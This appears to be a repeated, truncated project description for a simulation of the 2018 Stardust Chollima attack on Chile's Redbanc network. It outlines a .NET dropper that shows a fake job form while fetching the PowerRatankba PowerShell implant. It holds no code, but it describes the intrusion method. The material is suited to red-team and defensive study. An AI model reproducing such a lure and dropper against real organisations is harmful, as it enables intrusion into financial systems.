Stardust Chollima APT Adversary Simulation
Contents
Stardust Chollima APT Adversary Simulation
This is a simulation of attack by (Stardust Chollima) APT group targeting Chilean interbank network, The attack campaign was active in December 2018, have used PowerRatankba, a PowerShell-based malware variant that closely resembles the original Ratankba implant. The Redbanc corporate network was infected with a version of the PowerRatankba that was not detected by anti-malware. The way attackers delivered the malware, according to Flashpoint a trusted Redbanc IT professional clicked to apply to a job opening found on social media (linkedin). I relied on Security Affairs to figure out the details to make this: https://securityaffairs.com/79929/breaking-news/chilean-research-redbank-lazarus.html
imageedit_2_7042384654
Stardust Chollima Operations performed: https://apt.etda.or.th/cgi-bin/showcard.cgi?g=Subgroup%3A%20Bluenoroff%2C%20APT%2038%2C%20Stardust%20Chollima&n=1
The dropper used to deliver the malware is related to the PowerRatankba, a Microsoft Visual C#/ Basic .NET compiled executable associated with Stardust Chollima APT. The dropper was used to download a PowerRatankba PowerShell reconnaissance tool, the dropper displays a fake job application form while downloads and executes …
This is a simulation of attack by (Stardust Chollima) APT group targeting Chilean interbank network, The attack campaign was active in December 2018, have used PowerRatankba, a PowerShell-based malware variant that closely resembles the original Ratankba implant. The Redbanc corporate network was infected with a version of the PowerRatankba that was not detected by anti-malware. The way attackers delivered the malware, according to Flashpoint a trusted Redbanc IT professional clicked to apply to a job opening found on social media (linkedin). I relied on Security Affairs to figure out the details to make this: https://securityaffairs.com/79929/breaking-news/chilean-research-redbank-lazarus.html
imageedit_2_7042384654
Stardust Chollima Operations performed: https://apt.etda.or.th/cgi-bin/showcard.cgi?g=Subgroup%3A%20Bluenoroff%2C%20APT%2038%2C%20Stardust%20Chollima&n=1
The dropper used to deliver the malware is related to the PowerRatankba, a Microsoft Visual C#/ Basic .NET compiled executable associated with Stardust Chollima APT. The dropper was used to download a PowerRatankba PowerShell reconnaissance tool, the dropper displays a fake job application form while downloads and executes …